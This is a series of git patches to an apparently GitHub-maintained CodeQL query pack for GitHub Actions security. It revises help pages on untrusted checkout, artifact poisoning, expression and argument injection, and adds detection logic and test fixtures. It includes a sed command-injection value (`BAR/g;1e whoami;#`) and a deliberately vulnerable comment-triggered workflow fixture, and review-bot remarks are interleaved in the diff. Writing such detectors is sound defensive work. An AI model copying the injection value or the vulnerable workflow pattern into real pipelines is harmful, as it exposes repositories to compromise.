permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. 
- -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: 
@@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md index be1b566083ae..1e7ea120cbaa 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -10,7 +10,7 @@ When an `if` condition erroneously evaluates to `true`, unintended steps may be To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: -1. Do not use Workflow Expressions in `if` conditions. +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. 2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. 3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. 
@@ -18,45 +18,45 @@ To avoid the vulnerability where an `if` condition always evaluates to `true`, i ### Correct Usage -1. Do not use Workflow Expressions: +1. Omit `${{` and `}}` in `if` conditions: -```yaml -if: steps.checks.outputs.safe_to_run == true -if: |- - steps.checks.outputs.safe_to_run == true -if: | - steps.checks.outputs.safe_to_run == true -``` + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` -2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: -```yaml -if: ${{ steps.checks.outputs.safe_to_run == true }} -if: |- - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ### Incorrect Usage 1. Do not mix Workflow Expressions with un-delimited expressions: -```yaml -if: ${{ steps.checks.outputs.safe_to_run }} == true -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` 2. Do not include trailing new lines or spaces: -```yaml -if: | - ${{ steps.checks.outputs.safe_to_run == true }} -if: > - ${{ steps.checks.outputs.safe_to_run == true }} -if: " ${{ steps.checks.outputs.safe_to_run == true }}" -if: |+ - ${{ steps.checks.outputs.safe_to_run == true }} -if: >+ - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ## References 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md index 2d7afb6b66e1..9b1782d6ba84 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow 
@@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md index 2d7afb6b66e1..9b1782d6ba84 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations 
@@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description 
@@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md 
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description 
@@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i
 - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
 - Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
-The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
-The artifacts downloaded from the first workflow should be considered untrusted and verified.
+The artifacts downloaded from the first workflow should be considered untrusted and must be verified.
 ## Examples
From d6027267aaeda10673ad3f7433b9e1085dbb0dce Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?=
Date: Mon, 12 Aug 2024 09:31:58 +0000
Subject: [PATCH 478/707] fix variable name
---
 ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +-
 ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md
index 436cf6859964..36622d127d80 100644
--- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md
+++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md
@@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted
 ### Incorrect Usage
-Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps:
+Consider the following basic setup where an environment variable `PATH` is set:
 ```yaml
 steps:
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md
index 436cf6859964..36622d127d80 100644
--- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md
+++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md
@@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted
 ### Incorrect Usage
-Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps:
+Consider the following basic setup where an environment variable `PATH` is set:
 ```yaml
 steps:
From 0baf7e3cef12575952606e6716e72ab0b36556b1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 12 Aug 2024 13:08:38 +0200
Subject: [PATCH 479/707] Update qlpack.yml
---
 ql/src/qlpack.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 9b4795a0d8a4..b0d446479d88 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.36
+version: 0.1.37
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 1ca985b4152e9bad720464f066e35a0a69c89a68 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 12 Aug 2024 13:09:06 +0200
Subject: [PATCH 480/707] Update qlpack.yml
---
 ql/lib/qlpack.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index d9889fb08694..887228ecf882 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.36
+version: 0.1.37
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
From 293dd1a32b4a757069ace51820ce3e0472db2257 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 23 Aug 2024 17:40:25 +0200
Subject: [PATCH 481/707] Update ArgumentInjectionCritical.md
---
 ql/src/Security/CWE-088/ArgumentInjectionCritical.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
index 4957297be92a..92e480e4a7ae 100644
--- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
+++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
@@ -31,7 +31,7 @@ jobs:
 cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt
 ```
-An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation.
+An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation.
 ## References
From 4f57aade35d120635eca67e5f1b706fd9d04b3fb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 6 Sep 2024 10:49:27 +0200
Subject: [PATCH 482/707] Improve accuracy of actions/download-artifact as a source
If upload is on the same workflow, it needs to be triggered by a priv workflow
---
 .../security/ArtifactPoisoningQuery.qll | 6 +-
 .../.github/workflows/direct_cache6.yml | 2 +-
 .../.github/workflows/untrusted_checkout4.yml | 100 ++++++++++++++++++
 .../ArtifactPoisoningCritical.expected | 3 -
 .../CWE-829/ArtifactPoisoningMedium.expected | 4 -
 .../UntrustedCheckoutCritical.expected | 10 ++
 6 files changed, 115 insertions(+), 10 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index 08a49ab1abbf..6881caccd52e 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
@@ -26,8 +26,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us
 exists(this.getArgument("github-token"))
 or
 // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step
- exists(UsesStep checkout, UsesStep upload |
- this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and
+ exists(LocalJob job, UsesStep checkout, UsesStep upload |
+ this.getEnclosingWorkflow().getAJob() = job and
+ job.getAStep() = checkout and
+ job.getATriggerEvent().getName() = "pull_request_target" and
 checkout.getCallee() = "actions/checkout" and
 checkout.getAFollowingStep() = upload and
 upload.getCallee() = "actions/upload-artifact"
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
index 3f35068eb7dc..5948474d21ad 100644
--- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
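Review bot: The new same-workflow condition only recognises a job whose trigger event is `pull_request_target`, so an upload step that follows an attacker-influenced checkout under any other privileged trigger is no longer treated as a poisoning source; the `untrusted_checkout4.yml` fixture added in this same commit runs its checkout from an `issue_comment` trigger, which is exactly such a case. If the library already has a predicate that decides whether a trigger is privileged, reusing it on the `job.getATriggerEvent().getName() = "pull_request_target"` line would keep this check consistent with the rest of the queries; otherwise a comment above that line explaining why only `pull_request_target` qualifies would help the next reader. The `exists(...)` conjunct is part of a predicate whose beginning and closing lie outside the hunk.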
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
@@ -23,7 +23,7 @@ jobs:
 key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
 restore-keys: ${{ runner.os }}-pip-
 - name: Download artifact
- uses: actions/download-artifact@v4
+ uses: dawidd6/action-download-artifact@v2
 with:
 name: results
 path: results/
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
new file mode 100644
index 000000000000..5494d97797e2
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
@@ -0,0 +1,100 @@
+name: Auto Bump Versions
+
+on:
+ issue_comment:
+ types: [created, edited]
+
+jobs:
+ add-same-version-label-to-pr:
+ runs-on: ubuntu-latest
+ if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label')
+ steps:
+ - uses: actions/checkout@v3
+ - name: Add same version label
+ uses: actions/github-script@v6
+ if: success()
+ with:
+ github-token: ${{secrets.GITHUB_TOKEN}}
+ script: |
+ github.rest.issues.addLabels({
+ issue_number: context.issue.number,
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ labels: ['same version']
+ })
+ github.rest.issues.createComment({
+ issue_number: context.issue.number,
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ body: '👋 Added [same version] label :)!'
+ })
+
+ build:
+ if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version')
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Get PR details
+ uses: actions/github-script@v6
+ id: get-pr
+ with:
+ script: |
+ const request = {
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: context.issue.number
+ }
+ core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`)
+ try {
+ const result = await github.rest.pulls.get(request)
+ return result.data
+ } catch (err) {
+ core.setFailed(`Request failed with error ${err}`)
+ }
+
+ - name: Checkout PR
+ uses: actions/checkout@v3
+ with:
+ repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }}
+ ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }}
+
+ - name: Update version minor
+ if: contains(github.event.comment.body, '/version minor')
+ run: |
+ ./version.sh -u -n
+ echo "BUMP_TYPE=minor" >> $GITHUB_ENV
+
+ - name: Update version major
+ if: contains(github.event.comment.body, '/version major')
+ run: |
+ ./version.sh -u -m
+ echo "BUMP_TYPE=major" >> $GITHUB_ENV
+
+ - name: Update version patch
+ if: contains(github.event.comment.body, '/version 
patch')
+ run: |
+ ./version.sh -u -p
+ echo "BUMP_TYPE=patch" >> $GITHUB_ENV
+
+ - name: Add labels
+ uses: actions/github-script@v6
+ if: ${{ env.BUMP_TYPE }}
+ with:
+ script: |
+ github.rest.issues.addLabels({
+ issue_number: context.issue.number,
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ labels: ['version/${{ env.BUMP_TYPE }}']
+ })
+
+ - name: Push Changes
+ if: ${{ env.BUMP_TYPE }}
+ run: |
+ git config user.name 'github-actions[bot]'
+ git config user.email 'github-actions[bot]@users.noreply.github.com'
+ git pull
+ git add .
+ git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff
+ git push
+
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
index 56ec92c54b6c..11c6b98dc874 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
@@ -14,7 +14,6 @@ edges
 | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | |
 | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | |
 | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | |
-| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | |
 nodes
 | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step |
 | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build |
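Review bot: The new `untrusted_checkout4.yml` fixture does not mark which of its steps are the expected findings, whereas the `secrets-in-artifacts.yml` fixture added later in this series annotates each job with `# VULNERABLE` / `# NOT VULNERABLE`. A `# VULNERABLE` comment on the `Checkout PR` step and on the three `Update version` run steps (the ones the updated `UntrustedCheckoutCritical.expected` lists) would let a reader see the intent of the fixture without opening the expected file, and a `# NOT VULNERABLE` on `add-same-version-label-to-pr` would document why that job's checkout is not reported. The fixture spans two physical lines of this page; the hunk is complete.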
@@ -46,8 +45,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index da10247f1e0f..431386fae068 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,5 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index d5ad134c9768..8707849328b8 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -147,6 +147,13 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | 